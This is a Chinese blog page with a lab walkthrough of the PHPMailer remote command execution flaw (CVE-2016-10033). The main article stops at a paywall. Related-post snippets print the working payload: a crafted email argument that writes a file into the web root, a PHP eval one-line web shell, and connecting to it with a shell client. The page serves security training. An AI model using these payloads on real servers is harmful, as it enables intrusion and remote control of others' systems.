墨者靶场 初级:PHPMailer远程命令执行漏洞溯源

最新推荐文章于 2024-05-23 09:52:21 发布
最新推荐文章于 2024-05-23 09:52:21 发布
阅读量673 收藏
点赞数
分类专栏: 靶场实战 文章标签: PHPMailer 安全 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/103978708
版权
本文通过一个初级安全实训场景,介绍了PHPMailer的安全漏洞。内容包括:背景介绍、实训目标、解题思路和详细步骤。实训目标涉及理解PHPMailer的用途、Burp Suite的Spider模块使用、漏洞成因及利用方法。最终,通过实际操作,成功利用漏洞获取并提交了key值。
摘要由CSDN通过智能技术生成

墨者靶场 初级:PHPMailer远程命令执行漏洞溯源

题目

在这里插入图片描述

背景介绍

安全工程师对某网站进行授权测试,发现了一个管理员留下的邮件测试页面,你能帮他完成测试吗

实训目标

1、了解PHPMailer用处;
2、了解Burp suite中Spider模块使用方法;
3、了解PHPMailer远程命令执行漏洞形成原因;
4、了解PHPMailer远程命令执行漏洞利用方法

解题方向

PHPMailer远程命令执行漏洞利用

解题步骤

启动靶场,打开链接访问,是一个显示页面,翻到底部有个邮件链接,点击链接。
在这里插入图片描述
看到数据提交的页面,在这里上传shell。
随便输个错误网址,让网页报个错。
在这里插入图片描述
可以看到是linux系统搭建的网站,所以路径我们就知道了,插shell。

1.任意用户名
2.在email写入
最低0.47元/天 解锁文章
CNwanku
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
谢公子的博客
04-05 2122
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。 CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造...
墨者学院-PHPMailer远程命令执行漏洞溯源
qq_47094508的博客
07-01 918
拿到靶场之后点击访问分享一个小工具,用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面,很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包,更改email处payload为 更改message处payload为 然后访问http://124.70.71.251
PHPMailer远程命令执行漏洞溯源
cc_de_csdn的博客
08-25 295
1.打开靶场,找到发送邮件的位置,进入邮件页面 2.填写邮件消息 1.任意用户名 2.在email写入: “aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 3.在message写入: <?php @eval($_POST[a]);?> 3.使用菜刀连接,链接是:http://219.153.49.228:4105...
墨者PHPMailer远程命令执行漏洞溯源题解
zr1213159840的博客
01-07 467
打开环境后,给了一个页面,但是啥也没有,看不出来 对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php 百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。 打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com 在your message中填入一句话木马 &
墨者 - PHPMailer远程命令执行漏洞溯源
吃肉唐僧的博客
06-30 1479
用bp抓包,发现与后台交互的文件 构建email "aaa".-OQueueDirectory=/tmp/.-X/var/www/html/a.php@ aaa.com message <?php@eval($_REQUEST[a]);?> 访问a.php文件,上传成功 菜刀无惧链接 原理参考:https...
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现
qq_43233085的博客
01-21 1437
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 使用御剑扫...
墨者靶场 初级:Struts2远程代码执行漏洞(S2-016)
qq_43233085的博客
01-13 694
墨者靶场 初级: Apache Struts2远程代码执行漏洞题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。并且该版本存在高危漏洞,不知道运维人员是否修补了漏洞。 实训目标 1、了解Apache Struts2框架; 2、了解Apache Struts2远程代码执行...
墨者靶场 初级:Struts2远程代码执行漏洞(S2-004)
qq_43233085的博客
01-14 839
墨者靶场 初级:Struts2远程代码执行漏洞(S2-004)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。不知道运维人员是否修补了漏洞。 实训目标 1、了解Apache Struts2框架; 2、了解Apache Struts2目录遍历漏洞(S2-004); 3、...
PHPMailer远程命令执行漏洞复现
小小猪的博客
12-13 1553
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 影响版本: PHPMailer<5.2.18 环境搭建: 这里采用现成靶机 漏洞复现: aaa "aaa". -O
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 553
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞。 CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
主机渗透——CRC_3_PENTEST_2_WORDPRESS
B_roin的博客
02-15 1293
1. 该题使用的是wordpress框架,可以利用WPScan进行扫描 注意:带着token才能扫描出漏洞 WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932 在这里利用mailpress插件的命令执行漏洞,越权执行命令 2. 利用漏洞 http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php 利用hackbar或者burp su
PHPMailer发送邮件(PHP发送电子邮件)
TANKING,开源开发者!
12-15 2041
很多网站注册时都会要求输入电子邮箱,其应用场景是比较广的,例如注册账号接收验证码、注册成功通知、登录通知、找回密码验证通知等。本文将介绍如何使用PHP实现发送邮件。
安鸾之RCE系列
柠鹿的轨迹
08-28 820
0x00 webshell&中国菜刀 0o00 题目提示 0o01 执行过程 0x01 命令执行01 0o00 题目提示 0o01 Linux命令符 0o02 执行过程 0x02 破壳漏洞 0o00 题目提示 0o01 ShellShock 0o01 执行过程 0x03 PHPmailer 0o00 题目提示 0o01 phpMailer 0o02 执行过程 0x04 命令执行02 0o00 题目提示 0o01 DNSlog 0o01 执行过程...
php危险函数及rce漏洞
qq_58683895的博客
10-25 801
php危险函数的掩饰执行,以及rce漏洞的介绍
探索PHPMailer安全边界:CVE-2016-10033漏洞的重现与利用
最新发布
gitblog_00057的博客
05-23 340
探索PHPMailer安全边界:CVE-2016-10033漏洞的重现与利用 exploit-CVE-2016-10033PHPMailer < 5.2.18 Remote Code Execution exploit and vulnerable container项目地址:https://gitcode.com/gh_mirrors/ex/exploit-CVE-2016-10033 在广...
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值